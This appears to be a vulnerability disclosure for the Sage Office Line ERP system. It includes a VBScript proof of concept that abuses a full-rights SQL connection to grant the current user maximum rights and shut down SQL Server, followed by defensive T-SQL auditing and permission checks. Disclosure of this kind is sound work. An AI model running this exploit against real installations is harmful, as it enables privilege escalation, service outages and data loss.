Security Vulnerability in German ERP system "Sage Office Line"

Recently, I discovered a security vulnerability in the German ERP system "Sage Office Line", created by the German branch of the UK-based Sage Group. The software is sold in Germany, Austria and Switzerland. According to their website, Sage Germany has more than 250,000 customers.

-------------------------
Affected products:
-------------------------
- Sage Office Line Evolution 2012 (with newest patches installed)
- Sage Office Line Evolution 2013 (with newest patches installed)
- most likely previous versions (untested)

-------------------------
Effects:
-------------------------
- Code execution
- Privilege escalation
- Data loss

-------------------------
Details:
-------------------------
The software is based on a Microsoft Access frontend client (available as ADE and ADP) and some server-based tools. Microsoft SQL Server is used to store all data. A typical client installation on the computer of each office worker contains the MS Access frontend and also many .NET assemblies called via COM interop by the Access client.

The main entry point for the vulnerability is the so-called "mandator object", which is instantiated when a user logs in to the software. This object holds all information regarding the accessed database and also about the privileges of the user. If a user has valid credentials to start the software, even with minimal permissions, he can use local VBScript and COM automation to gain full access to the mandator object. This object holds, among other interesting things, an ADO.NET connection object, which was instantiated with an SQL user with full rights on the affected database. Using this connection object, the user can give himself full permissions or even delete all data in the database.

According to Sage Software, there is a feature called "Erweiterte Codesicherheit" ("Extended Code Security") which should secure the system by blocking unsigned code from accessing the system. This feature has no effect on the vulnerability described in this post.

-------------------------
Proof of Concept:
-------------------------
The following code has to be saved locally in a VBS file. It may be necessary to adjust the path to the MS Access ADE file. It grants full access to the current user and then tries to shut down the SQL Server service.

    ' Attach to the running/loaded Access frontend via its ADE file.
    ' Adjust the path to the local installation (the path separators are missing here).
    Set objAccess = GetObject("C:Program Files (x86)SageOffice Line6.1Abfolabf_001.ade")
    ' Obtain the mandator object that the frontend creates at login.
    Set goMandant = objAccess.Run("goMandant")
    ' Use its database connection (full-rights SQL user) to raise the current user's rights.
    goMandant.oData.Execute "UPDATE USysSecurityClients SET Rights = 3 WHERE UserName='" & goMandant.oBenutzer.sName & "'"
    ' Same connection against the server: attempt to stop the SQL Server service.
    goMandant.oGlobalData.Execute "SHUTDOWN WITH NOWAIT"
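The root cause described above is that every client session runs on one SQL login with full rights, so the permission table can be rewritten and the server can be shut down from any workstation. The following T-SQL is an added example written for this post, not Sage's code and not part of the original advisory: it records every change to the Rights column of USysSecurityClients (table and column names from the PoC; the dbo schema, UserName as the row key, the audit table and its column types are my assumptions), and it lists the server principals that are able to run SHUTDOWN, so an administrator can check whether the application login is one of them.

```sql
-- Added example (not Sage's code): make changes to USysSecurityClients.Rights visible.
-- Assumptions: table is dbo.USysSecurityClients with UserName identifying a row;
-- the audit table name and column types are chosen for this example.
CREATE TABLE dbo.SecurityRightsAudit (
    AuditId   INT IDENTITY(1,1) PRIMARY KEY,
    UserName  NVARCHAR(128) NOT NULL,
    OldRights INT NULL,
    NewRights INT NULL,
    SqlLogin  NVARCHAR(128) NOT NULL,  -- ORIGINAL_LOGIN(): the shared application login
    HostName  NVARCHAR(128) NULL,      -- HOST_NAME(): workstation the change came from
    AppName   NVARCHAR(128) NULL,      -- APP_NAME(): client-reported, so only a hint
    ChangedAt DATETIME2(0) NOT NULL DEFAULT SYSUTCDATETIME()
);
GO

-- Trigger fires on every UPDATE; only rows whose Rights value actually changed are logged.
CREATE TRIGGER dbo.trg_USysSecurityClients_RightsAudit
ON dbo.USysSecurityClients
AFTER UPDATE
AS
BEGIN
    SET NOCOUNT ON;
    IF NOT UPDATE(Rights) RETURN;

    INSERT INTO dbo.SecurityRightsAudit (UserName, OldRights, NewRights, SqlLogin, HostName, AppName)
    SELECT i.UserName, d.Rights, i.Rights, ORIGINAL_LOGIN(), HOST_NAME(), APP_NAME()
    FROM inserted AS i
    JOIN deleted  AS d ON d.UserName = i.UserName
    WHERE ISNULL(d.Rights, -1) <> ISNULL(i.Rights, -1);
END;
GO

-- Review: rights that were raised. The PoC sets Rights = 3 for the calling user;
-- a jump to the maximum outside an administrator's session is the signal to look at.
SELECT AuditId, UserName, OldRights, NewRights, SqlLogin, HostName, AppName, ChangedAt
FROM dbo.SecurityRightsAudit
WHERE NewRights > ISNULL(OldRights, 0)
ORDER BY ChangedAt DESC;
GO

-- Review: who may run SHUTDOWN. Members of sysadmin/serveradmin ...
SELECT m.name AS login_name, m.type_desc, r.name AS server_role
FROM sys.server_role_members   AS rm
JOIN sys.server_principals     AS r  ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals     AS m  ON m.principal_id = rm.member_principal_id
WHERE r.name IN (N'sysadmin', N'serveradmin')
ORDER BY r.name, m.name;

-- ... and logins holding the SHUTDOWN or CONTROL SERVER permission directly.
-- The application's SQL login should appear in neither result set.
SELECT p.name AS login_name, sp.permission_name, sp.state_desc
FROM sys.server_permissions AS sp
JOIN sys.server_principals  AS p ON p.principal_id = sp.grantee_principal_id
WHERE sp.permission_name IN (N'SHUTDOWN', N'CONTROL SERVER')
  AND sp.state IN ('G', 'W');
GO
```

The trigger is a detective control, not a fix: a login with full rights on the database can also alter it, and every row will show the same SqlLogin because all clients share that login, which is exactly the design problem the advisory points at. The permanent remedy is a client connection that holds no more than the rights of the logged-in user, with SHUTDOWN and sysadmin reserved for administrators.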